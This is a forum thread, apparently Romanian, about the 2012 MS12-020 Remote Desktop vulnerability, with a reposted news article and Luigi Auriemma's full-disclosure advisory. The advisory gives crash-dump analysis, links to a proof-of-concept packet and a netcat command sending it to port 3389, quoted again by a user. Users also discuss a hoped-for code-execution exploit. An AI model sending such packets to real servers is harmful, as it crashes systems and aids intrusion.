Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately

[Nytro]

Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately

By Brian Prince on March 13, 2012

Microsoft is urging organizations to apply the sole critical update in this month’s Patch Tuesday release as soon as possible.

The critical bulletin – one of six security bulletins issued as part of today’s release – addresses two vulnerabilities in the Remote Desktop Protocol (RDP).

“A little about MS12-020…this bulletin addresses one Critical-class issue and one Moderate-class issue in Remote Desktop Protocol (RDP),” Angela Gunn, security response communications manager for Microsoft’s Trustworthy Computing Group, explained in a blog post. “Both issues were cooperatively disclosed to Microsoft and we know of no active exploitation in the wild. The Critical-class issue applies to a fairly specific subset of systems – those running RDP – and is less problematic for those systems with Network Level Authentication (NLA) enabled.”

“That said, we strongly recommend that customers examine and prepare to apply this bulletin as soon as possible,” she added. “The Critical-class issue could allow a would-be attacker to achieve remote code execution on a machine running RDP (a non-default configuration); if the machine does not have NLA enabled, the attacker would not require authentication for RCE access.”

Ben Greenbaum, senior principle software engineer for Symantec’s Security Intelligence Group, agreed users should pay close attention to the RDP vulnerability.

“RDP’s purpose is to enable remote access from the Internet, but preferably to an authenticated user,” he said. “In this case, a malicious attacker can potentially take complete control of the computer. Failed exploit attempts of this issue will likely result in the user being confronted with the blue screen of death. If an attacker can bypass standard memory protection measures, however, they will have access at the kernel level.”

Those IT admins who use RDP to manage their machines over the internet, which is essentially the default in cloud-based installations such as Amazon’s AWS, need to patch as quickly as possible, Qualys CTOWolfgang Kandek opined.

“If the patch cannot be applied that quickly or the necessary reboot cannot be scheduled, IT Admins should look into the available work-arounds that function immediately: protect the machine with restrictive firewalling, access RDP through a VPN service or switch to Microsoft’s NLA protocol that is supported in newer versions of Windows (Vista+) and is not vulnerable to the attack,” he said.

Besides the RDP bugs, this month’s Patch Tuesday addressed five other vulnerabilities: two denial-of-service bugs and an escalation of privileges issue in Microsoft Windows; a remote code execution vulnerability in Microsoft Expression Design; and an escalation of privileges issue in Microsoft Visual Studio. All those issues are rated ‘important’ with the exception of one of the Windows’ denial-of-service bugs, which is rated ‘moderate.’

Also today, Adobe updated its ColdFusion software to address a vulnerability in versions 9.0.1 and earlier for Windows, Macintosh and UNIX systems that could lead to a denial-of-service attack using a hash algorithm collision. The company said it was unaware of any attempts to exploit the vulnerability in the wild.

Sursa: Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately | SecurityWeek.Com

Via: Microsoft: RDP Vulnerability Should Be Patched Immediately - Slashdot

[Nytro]

Securitytube Speak Up: The Ms12-020 Fiasco!

Suspicions aroused as exploit for critical Windows bug is leaked (Updated)

http://aluigi.org/adv/ms12-020_leak.txt

[Guest expl0iter]

Mda.. oricat s-ar chinui Microsoftsa rezolve vulnerabilitatile din windows, hackerii tot gasesc o metoda de a le exploata.

[Nytro]

Full disclosure

#######################################################################
                             Luigi Auriemma
Application:  Microsoft Terminal Services / Remote Desktop Services
              http://www.microsoft.com
              http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx
Versions:     any Windows version before 13 Mar 2012
Platforms:    Windows
Bug:          use after free
Exploitation: remote, versus server
Date:         16 Mar 2012 (found 16 May 2011)
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org
Additional references:
 http://www.zerodayinitiative.com/advisories/ZDI-12-044/
 http://technet.microsoft.com/en-us/security/bulletin/ms12-020
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's homepage:
"The Microsoft Remote Desktop Protocol (RDP) provides remote display
and input capabilities over network connections for Windows-based
applications running on a server. RDP is designed to support different
types of network topologies and multiple LAN protocols."
#######################################################################
======
2) Bug
======
The Remote Desktop Protocol is used by the "Terminal Services / Remote
Desktop Services" and works at kernel level on port 3389.
There is an use-after-free vulnerability located in the handling of the
maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of
the provided proof-of-concept) when set to a value minor/equal than 5.
The problem happens during the disconnection of the user started with
RDPWD!NM_Disconnect while the effect of the possible code execution is
visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on
Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid
memory pointer, the following dump is taken from Windows 2003 Server:
  f761887c 8bff            mov     edi,edi
  f761887e 55              push    ebp
  f761887f 8bec            mov     ebp,esp
  f7618881 56              push    esi
  f7618882 57              push    edi
  f7618883 8b7d08          mov     edi,dword ptr [ebp+8]
  f7618886 8d47ec          lea     eax,[edi-14h]
  f7618889 50              push    eax
  f761888a eb09            jmp     termdd!IcaBufferAlloc+0x19 (f7618895)
  f761888c 8b4618          mov     eax,dword ptr [esi+18h]                  ; we are here
  f761888f 833800          cmp     dword ptr [eax],0                        ; or here
  f7618892 7527            jne     termdd!IcaBufferAlloc+0x3f (f76188bb)    ; must jump
  f7618894 56              push    esi
  f7618895 e878290000      call    termdd!IcaGetPreviousSdLink (f761b212)   ; the new ESI is returned by this function
  f761889a 8bf0            mov     esi,eax
  f761889c 85f6            test    esi,esi
  f761889e 75ec            jne     termdd!IcaBufferAlloc+0x10 (f761888c)
  f76188a0 ff751c          push    dword ptr [ebp+1Ch]
  f76188a3 ff7518          push    dword ptr [ebp+18h]
  f76188a6 ff7514          push    dword ptr [ebp+14h]
  f76188a9 ff7510          push    dword ptr [ebp+10h]
  f76188ac ff750c          push    dword ptr [ebp+0Ch]
  f76188af 57              push    edi
  f76188b0 e8b9fcffff      call    termdd!IcaBufferAllocInternal (f761856e)
  f76188b5 5f              pop     edi
  f76188b6 5e              pop     esi
  f76188b7 5d              pop     ebp
  f76188b8 c21800          ret     18h
  f76188bb 33c0            xor     eax,eax
  f76188bd 53              push    ebx
  f76188be 8d7e10          lea     edi,[esi+10h]
  f76188c1 40              inc     eax
  f76188c2 f00fc107        lock xadd dword ptr [edi],eax
  f76188c6 ff751c          push    dword ptr [ebp+1Ch]
  f76188c9 8b4618          mov     eax,dword ptr [esi+18h]                  ; the same value of before
  f76188cc ff7518          push    dword ptr [ebp+18h]
  f76188cf ff7514          push    dword ptr [ebp+14h]
  f76188d2 ff7510          push    dword ptr [ebp+10h]
  f76188d5 ff750c          push    dword ptr [ebp+0Ch]
  f76188d8 ff761c          push    dword ptr [esi+1Ch]
  f76188db ff10            call    dword ptr [eax]                          ; code execution
  f76188dd 8bd8            mov     ebx,eax
  f76188df 83c8ff          or      eax,0FFFFFFFFh
  f76188e2 f00fc107        lock xadd dword ptr [edi],eax
  f76188e6 7506            jne     termdd!IcaBufferAlloc+0x72 (f76188ee)
  f76188e8 56              push    esi
  f76188e9 e8382f0000      call    termdd!_IcaUnloadSd (f761b826)
  f76188ee 8bc3            mov     eax,ebx
  f76188f0 5b              pop     ebx
  f76188f1 ebc2            jmp     termdd!IcaBufferAlloc+0x39 (f76188b5)
  eax=040b0402 ebx=e1492090 ecx=00390080 edx=00000003 esi=040b0402 edi=e1438240
  eip=f762888c esp=b832f9d8 ebp=b832f9e0 iopl=0         nv up ei pl nz na po nc
  cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
  termdd!IcaBufferAlloc+0x10:
  f762888c 8b4618          mov     eax,dword ptr [esi+18h] ds:0023:040b041a=????????
  ChildEBP RetAddr
  b8b399e0 b89c1c34 termdd!IcaBufferAlloc+0x10
  b8b39a00 b89c1c67 RDPWD!StackBufferAlloc+0x26
  b8b39a2c b89a902c RDPWD!MCSDetachUserRequest+0x29
  b8b39a40 b89a8b44 RDPWD!NMDetachUserReq+0x14
  b8b39a4c b89a9185 RDPWD!NM_Disconnect+0x16
  b8b39a58 b89adcb4 RDPWD!SM_Disconnect+0x27
  b8b39a68 b89a906d RDPWD!SM_OnConnected+0x70
  b8b39a88 b89a8db4 RDPWD!NMAbortConnect+0x23
  b8b39ac0 b89a9d88 RDPWD!NM_Connect+0x86
  b8b39ae0 b89abcfc RDPWD!SM_Connect+0x112
  b8b39b08 b89ac786 RDPWD!WDWConnect+0x368
  b8b39b3c b89a6959 RDPWD!WDWConfConnect+0x94
  b8b39b70 f762c1c7 RDPWD!WD_Ioctl+0x1227
  b8b39b8c f762c5a3 termdd!_IcaCallSd+0x35
  b8b39bac f762ca10 termdd!_IcaCallStack+0x55
  b8b39bf4 f762abcc termdd!IcaDeviceControlStack+0x414
  b8b39c24 f762ad20 termdd!IcaDeviceControl+0x4e
  b8b39c3c 8081d5c3 termdd!IcaDispatch+0x12a
  b8b39c50 808ed4eb nt!IofCallDriver+0x45
  b8b39c64 808ee28d nt!NtWriteFile+0x2943
  b8b39d00 808e6dbc nt!NtWriteFile+0x36e5
  b8b39d34 80883968 nt!NtDeviceIoControlFile+0x2a
  b8b39d64 7c82847c nt!KeReleaseInStackQueuedSpinLockFromDpcLevel+0xb14
  b8b39d68 badb0d00 ntdll!_NLG_Notify+0x14
On Windows 2003 that zone of the memory pointed by ESI+18 using the
provided proof-of-concept is ever in the range 040b02??-040b04??.
The exploitability depends by the possibility of controlling ESI or the
content pointed by it (maybe via a form of heap spraying?), indeed in
my quick tests this zone sometimes is allocated and others it isn't.
Note that on the post-Vista Windows versions (like 7 and 2008) "seems"
necessary to have "Allow connections from computers running any version
of Remote Desktop" for being vulnerable.
Anyway I'm not totally sure about this so-called limitation because it
looks like dependent by my proof-of-concept only.
The provided proof-of-concept uses the BER integer values set at 32bit
(big endian) in case they could be useful for easier debugging.
Additional details about the protocol:
http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/termdd_1.dat
http://www.exploit-db.com/sploits/18606.dat
  nc SERVER 3389 < termdd_1.dat
resend it multiple times in case of no results and note that this is
just a simple proof-of-concept packet to quickly test the bug so it's
not optimized at all.
#######################################################################
======
4) Fix
======
http://technet.microsoft.com/en-us/security/bulletin/ms12-020
#######################################################################

Luigi Auriemma FTW!

[phreak]

tot astept RCE PoC

[Nytro]

Citeste tot...

[Isaac]

windows 8 nu are asa ceva.

[phreak]

am citit, zice cum e posibil dar nu prezinta exploit cu RCE... doar crash

[Paul4games]

tot astept RCE PoC

Cred ca asta iti va spune ceva:

3) The Code
===========
http://aluigi.org/poc/termdd_1.dat
http://www.exploit-db.com/sploits/18606.dat
  nc SERVER 3389 < termdd_1.dat
resend it multiple times in case of no results and note that this is
just a simple proof-of-concept packet to quickly test the bug so it's
not optimized at all.

Ps: Dupa ce v-a fi implementata aceasta vulnerabilitate in metasploit sau va fi creat vreun tool sa foloseasca aceasta vulnerabilitate vor aparea peste noapte o gramada de scannere de rdp-uri "Private".

[phreak]

Presupunand ca a reusit cineva sa faca RCE in privat si ca cineva il va publica vreodata.. deocamdata nu exista vreun PoC RCE public.

BinaryNinjas | Reversing and stuff…

Private Paste - Pastie

[Nytro]

Exista pe un hosting chinezesc, dar nu am incercat.